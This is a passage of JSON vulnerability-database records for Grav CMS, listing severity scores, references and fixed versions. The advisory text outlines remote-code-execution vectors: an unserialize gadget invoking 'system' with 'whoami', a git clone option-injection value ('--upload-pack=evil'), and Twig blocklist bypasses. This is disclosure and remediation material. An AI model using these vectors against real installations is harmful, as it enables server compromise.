                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gwfr-jfjf-92vv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7317",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7317"
                },
                {
                    "reference_url": "https://vuldb.com/submit/798732",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://vuldb.com/submit/798732"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/359965",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/359965"
                },
                {
                    "reference_url": "https://vuldb.com/vuln/359965/cti",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://vuldb.com/vuln/359965/cti"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gwfr-jfjf-92vv",
                    "reference_id": "GHSA-gwfr-jfjf-92vv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-gwfr-jfjf-92vv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-7317",
                "GHSA-gwfr-jfjf-92vv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r2dh-em54-nyfz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93666?format=api",
            "vulnerability_id": "VCID-rcyu-yu31-n7gu",
            "summary": "Grav has multiple RCE vectors: unsafe unserialize (x3), command injection in git clone, SSTI blocklist bypass\nMultiple RCE vectors were found in Grav CMS. Three are critical, two are high.\n\n**1. Unsafe unserialize() in JobQueue — direct RCE gadget (Critical)**\n\n`system/src/Grav/Common/Scheduler/JobQueue.php:465` calls `unserialize(base64_decode(...))` without restricting `allowed_classes`. The `Job` class has `call_user_func_array($this->command, $this->args)` in its execution path, which is a direct gadget chain — inject a serialized `Job` with `command = 'system'` and `args = ['whoami']`.\n\nThe same codebase actually has a `Serializable` trait that correctly restricts classes, so this inconsistency stands out.\n\n**2. Unsafe unserialize() in FileCache — arbitrary class instantiation (Critical)**\n\n`system/src/Grav/Framework/Cache/Adapter/FileCache.php:75` does `unserialize($value, ['allowed_classes' => true])`. That `true` allows instantiation of any class. If an attacker can write to the cache directory (via any file write primitive), they get object injection → RCE.\n\n**3. Unsafe unserialize() in Session (High)**\n\n`system/src/Grav/Common/Session.php:116` — same `allowed_classes => true` pattern on session data. Lower severity since session storage is typically more restricted.\n\n**4. Command injection in git clone (Critical)**\n\n`system/src/Grav/Console/Cli/InstallCommand.php:150` — only `$this->destination` uses `escapeshellarg()`. The `$data['branch']`, `$data['url']`, and `$data['path']` variables go directly into the shell command without escaping. Admin-accessible via plugin/theme installation.\n\n**5. SSTI blocklist bypass (High)**\n\n`system/src/Grav/Common/Security.php:267-286` — `cleanDangerousTwig()` blocks `twig_array_map` and `twig_array_filter` but not `twig_array_reduce`. Also missing `file_get_contents` and `fwrite` from the dangerous function blocklist. 
An attacker who can inject Twig templates can bypass the security filter.\n\nAll five are independently exploitable. The unserialize issues are the most concerning since they don't require admin access if there's any file write primitive.\n\n— ProScan AppSec | proscan.one\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) (items #1, #2, #3, #4) and commit [`38685ac25`](https://github.com/getgrav/grav/commit/38685ac25) + [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) (item #5) — ships in **2.0.0-beta.2**.\n\nAll five vectors addressed:\n\n1. **Scheduler\\JobQueue unsafe unserialize** — `serialized_job` now carries a sibling `serialized_job_hmac` signed with `Security::getNonceKey()`. `reconstructJob` refuses to unserialize an item whose HMAC is missing/mismatched and falls through to the safe structured-fields rebuild. A tampered queue file can no longer smuggle a forged `Job` for direct RCE via `Job::exec → call_user_func_array`.  \n   → [`system/src/Grav/Common/Scheduler/JobQueue.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Scheduler/JobQueue.php)\n\n2. **FileCache unsafe unserialize** — same HMAC-integrity approach; see separate GHSA-gwfr-jfjf-92vv.  \n   → [`system/src/Grav/Framework/Cache/Adapter/FileCache.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Cache/Adapter/FileCache.php)\n\n3. **Session::getFlashObject unsafe unserialize** — payload now wrapped in a `v2|<hmac>|<serialized>` envelope; legacy/forged envelopes return null instead of triggering `unserialize`.  \n   → [`system/src/Grav/Common/Session.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Session.php)\n\n4. 
**InstallCommand `git clone` shell injection** — `branch`, `url`, and `path` values read from `user/.dependencies` are now passed through `escapeshellarg`, with a `--` separator before url/path to block option-injection (e.g. `--upload-pack=evil`).  \n   → [`system/src/Grav/Console/Cli/InstallCommand.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Console/Cli/InstallCommand.php)\n\n5. **SSTI blocklist bypass** — `twig_array_reduce` (the specific name called out) plus `twig_array_some` and `twig_array_every` added to `cleanDangerousTwig`'s `CALLABLE_DANGEROUS_NAMES` alongside the existing `twig_array_map`/`filter`. More importantly, the new Twig content sandbox in 2.0.0-beta.2 blocks this class of attack at a different layer — see the sandbox work in [`38685ac25`](https://github.com/getgrav/grav/commit/38685ac25).  \n   → [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php)\n\n**Tests:**\n- [`tests/unit/Grav/Common/Security/UnserializeIntegritySecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/UnserializeIntegritySecurityTest.php) — 8 cases covering JobQueue + Session HMAC integrity.\n- [`tests/unit/Grav/Common/Security/FileCacheSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FileCacheSecurityTest.php).\n- [`tests/unit/Grav/Common/Security/CleanDangerousTwigTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/CleanDangerousTwigTest.php) — new `twig_array_*` entries in `providerCallbackFunctions`.",
            "references": [
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-vj3m-2g9h-vm4p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-vj3m-2g9h-vm4p"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vj3m-2g9h-vm4p",
                    "reference_id": "GHSA-vj3m-2g9h-vm4p",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-vj3m-2g9h-vm4p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "GHSA-vj3m-2g9h-vm4p"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rcyu-yu31-n7gu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49444?format=api",
            "vulnerability_id": "VCID-rj4b-8dyu-juen",
            "summary": "Grav may be vulnerable to SSRF attack via Twig Templates\nIn grav <1.7.49.5, an SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66844",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17867",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66844"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-16T15:32:54Z/"
                        }
                    ],
                    "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66844",
                    "reference_id": "CVE-2025-66844",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66844"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-729w-j79f-2c34",
                    "reference_id": "GHSA-729w-j79f-2c34",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-729w-j79f-2c34"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/907178?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"
                }
            ],
            "aliases": [
                "CVE-2025-66844",
                "GHSA-729w-j79f-2c34"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rj4b-8dyu-juen"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45428?format=api",
            "vulnerability_id": "VCID-rsc3-r7fy-pkca",
            "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34253",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.02104",
                            "scoring_system": "epss",
                            "scoring_elements": "0.84421",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34253"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
                },
                {
                    "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"
                },
                {
                    "reference_url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"
                        }
                    ],
                    "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
                },
                {
                    "reference_url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"
                        }
                    ],
                    "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34253",
                    "reference_id": "CVE-2023-34253",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34253"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j3v8-v77f-fvgm",
                    "reference_id": "GHSA-j3v8-v77f-fvgm",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-j3v8-v77f-fvgm"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
                    "reference_id": "GHSA-j3v8-v77f-fvgm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-18T21:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
